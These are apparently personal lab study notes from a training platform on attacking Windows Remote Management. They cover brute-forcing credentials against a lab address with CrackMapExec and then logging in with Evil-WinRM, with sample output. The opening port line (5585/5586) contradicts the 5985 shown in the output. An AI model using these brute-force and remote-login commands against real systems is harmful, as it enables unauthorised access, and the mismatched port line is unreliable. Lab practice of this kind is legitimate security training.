Flo Aberger | Cyber Notes Structured writeups for labs, CTFs, and security projects.

Attacking Network Services

WINRM

Notes and commands for WINRM.

2024-04-01
Tags passwordsattacking-network-serviceswinrm
Back to Pentest Notes Search Notes

WinRM -

  • Port 5585, 5586

Installing Crackmapexec:(https://github.com/byt3bl33d3r/CrackMapExec)

  • Momothechi@htb[/htb]$ sudo apt-get -y install crackmapexec

Starting & Options

  • crackmapexec -h

More information on specific services: (f.e:smb)

  • crackmapexec smb -h

General usage

  • Get a User&PW:

  • Momothechi@htb[/htb]$ crackmapexec -u -p

  • Example Usage:

  • Momothechi@htb[/htb]$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

  • Output:

  • WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)

  • WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman

  • WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)

  • (Pwn3d!) We have a brute forced user and can potentially log in.

Communicate with the compromised machine once we have username and PW

  • Installing Evil-WinRM:

  • Momothechi@htb[/htb]$ sudo gem install evil-winrm

  • Example Usage with the brute forces uname/pw

  • Momothechi@htb[/htb]$ evil-winrm -i 10.129.42.197 -u user -p password